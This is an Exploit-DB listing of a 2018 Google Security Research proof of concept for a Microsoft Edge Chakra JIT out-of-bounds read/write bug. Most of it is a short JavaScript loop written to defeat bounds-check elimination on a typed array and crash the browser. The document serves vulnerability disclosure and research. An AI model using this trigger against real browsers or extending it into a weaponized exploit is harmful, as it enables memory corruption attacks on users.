Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes

  • Author: Google Security Research
    Date: 2018-07-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45011/
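
    /*
    It seems that this issue is similar to issue 1429 (MSRC 42111). You might need to refresh the page several times to observe a crash.

    PoC:
    */

    // The typed array holds 1000 elements, but the outer loop runs i up to 0x1000000.
    let arr = new Uint32Array(1000);
    for (let i = 0; i < 0x1000000; i++) {
        // Single-iteration inner loop: i-- followed by i++ leaves i unchanged.
        for (let j = 0; j < 1; j++) {
            i--;
            i++;
        }

        // Per the language spec, a typed-array store with i >= arr.length is ignored.
        arr[i] = 0x1234;
    }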